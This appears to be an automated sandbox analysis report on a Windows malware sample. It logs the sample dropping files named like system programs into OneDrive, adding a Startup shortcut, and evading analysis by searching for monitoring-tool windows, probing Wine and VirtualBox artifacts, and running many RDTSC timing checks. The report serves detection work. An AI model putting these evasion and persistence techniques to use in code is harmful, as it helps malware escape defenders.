                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\microsoft.net.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windowspowershell.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\microsoft office.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows photo viewer.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\autoit3.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows nt.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows multimedia platform.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows sidebar.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\reference assemblies.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\msbuild.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows defender.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnk
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D616 second address: 70D630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jp 00007F7290C62CB8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F7290C62CA6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70BEB6 second address: 70BEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70BEBA second address: 70BEBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D7B9 second address: 70D7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C4957 second address: 6C4993 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CB9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7290C62CB0h 0x00000017 jng 00007F7290C62CA6h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71176D second address: 711780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F7290766B2Dh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711780 second address: 7117C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290C62CAAh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7290C62CB4h 0x00000010 jmp 00007F7290C62CB0h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop edx 0x0000001d jo 00007F7290C62CBCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711AAC second address: 711ADE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F7290766B26h 0x00000009 pop edi 0x0000000a jmp 00007F7290766B38h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007F7290766B32h 0x00000017 je 00007F7290766B2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D4E second address: 711D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D56 second address: 711D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D5C second address: 711D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jo 00007F7290C62CAEh 0x0000000d jo 00007F7290C62CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D75 second address: 711D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 711D79 second address: 711D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713ED9 second address: 713F2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F7290766B2Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F7290766B34h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push esi 0x0000001d jmp 00007F7290766B2Eh 0x00000022 pop esi 0x00000023 pop eax 0x00000024 call 00007F7290766B29h 0x00000029 pushad 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F2C second address: 713F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F7290C62CA6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F39 second address: 713F8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F7290766B39h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F7290766B2Eh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7290766B39h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F8B second address: 713F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713F90 second address: 713FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F7290766B26h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 714168 second address: 71416C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7142CD second address: 7142D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 714DC7 second address: 714DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 714F51 second address: 714F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290766B30h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715194 second address: 715199 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715199 second address: 7151EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jbe 00007F7290766B2Ch 0x0000000f jl 00007F7290766B26h 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F7290766B28h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov edi, 216755F7h 0x00000036 push eax 0x00000037 pushad 0x00000038 je 00007F7290766B2Ch 0x0000003e jns 00007F7290766B26h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7151EA second address: 7151F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715723 second address: 715727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715727 second address: 71572B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71572B second address: 715791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F7290766B37h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F7290766B28h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push edi 0x00000029 pop edi 0x0000002a push edi 0x0000002b mov dword ptr [ebp+150D24A4h], ecx 0x00000031 pop esi 0x00000032 push 00000000h 0x00000034 jmp 00007F7290766B2Ch 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c mov esi, eax 0x0000003e pop edi 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007F7290766B26h 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715791 second address: 715795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 715795 second address: 71579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 718678 second address: 71867C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71867C second address: 718686 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A779 second address: 71A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290C62CB0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71C716 second address: 71C732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007F7290766B26h 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007F7290766B57h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F7290766B26h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71C732 second address: 71C736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71C736 second address: 71C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F7290766B37h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A55A second address: 71A56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F7290C62CACh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A56F second address: 71A574 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 722F98 second address: 722F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 720BF2 second address: 720BFC instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 722F9D second address: 722FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 720BFC second address: 720C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F7290766B32h 0x00000010 ja 00007F7290766B2Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 723221 second address: 723225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 726517 second address: 726521 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 724137 second address: 72414C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72414C second address: 724150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 724150 second address: 72415A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72415A second address: 724160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 727470 second address: 727476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 727476 second address: 7274D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F7290766B35h 0x0000000b jmp 00007F7290766B2Fh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 add ebx, 5FC6B88Ah 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F7290766B28h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov dword ptr [ebp+150D23E9h], esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7290766B2Ch 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7285BB second address: 7285C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7285C0 second address: 7285CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 729503 second address: 72950D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72950D second address: 72958E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+150D183Dh], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F7290766B28h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F7290766B30h 0x00000032 push 00000000h 0x00000034 jl 00007F7290766B2Bh 0x0000003a mov ebx, 36ACC9E0h 0x0000003f xchg eax, esi 0x00000040 push esi 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 pop edx 0x00000045 pop esi 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 jmp 00007F7290766B30h 0x0000004e pop eax 0x0000004f pushad 0x00000050 jmp 00007F7290766B37h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72A369 second address: 72A3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7290C62CA8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007F7290C62CB7h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F7290C62CA8h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007F7290C62CADh 0x00000048 adc edi, 10577C86h 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+150D2495h] 0x00000056 push eax 0x00000057 push edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72A3F4 second address: 72A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B411 second address: 72B421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B5B0 second address: 72B633 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290766B28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+152619CCh], esi 0x00000011 mov ebx, edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, 6845E4E5h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov edi, dword ptr [ebp+150D2A46h] 0x0000002c mov eax, dword ptr [ebp+150D0685h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F7290766B28h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+150D1ABBh] 0x00000054 pushad 0x00000055 ja 00007F7290766B2Bh 0x0000005b mov eax, dword ptr [ebp+150D1BC2h] 0x00000061 popad 0x00000062 nop 0x00000063 push ecx 0x00000064 push ebx 0x00000065 ja 00007F7290766B26h 0x0000006b pop ebx 0x0000006c pop ecx 0x0000006d push eax 0x0000006e pushad 0x0000006f push edi 0x00000070 je 00007F7290766B26h 0x00000076 pop edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B633 second address: 72B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 73139E second address: 7313A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731978 second address: 73197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 73197C second address: 731982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731C87 second address: 731CA8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290C62CACh 0x00000008 jnp 00007F7290C62CA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7290C62CADh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731CA8 second address: 731CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7357D9 second address: 7357DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7357DF second address: 7357E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 741A06 second address: 741A0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 741A0E second address: 741A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290766B2Ah 0x00000008 jl 00007F7290766B26h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F7290766B35h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74115A second address: 74115F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74115F second address: 741170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412CC second address: 7412E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CACh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412E0 second address: 7412E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412E5 second address: 7412EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
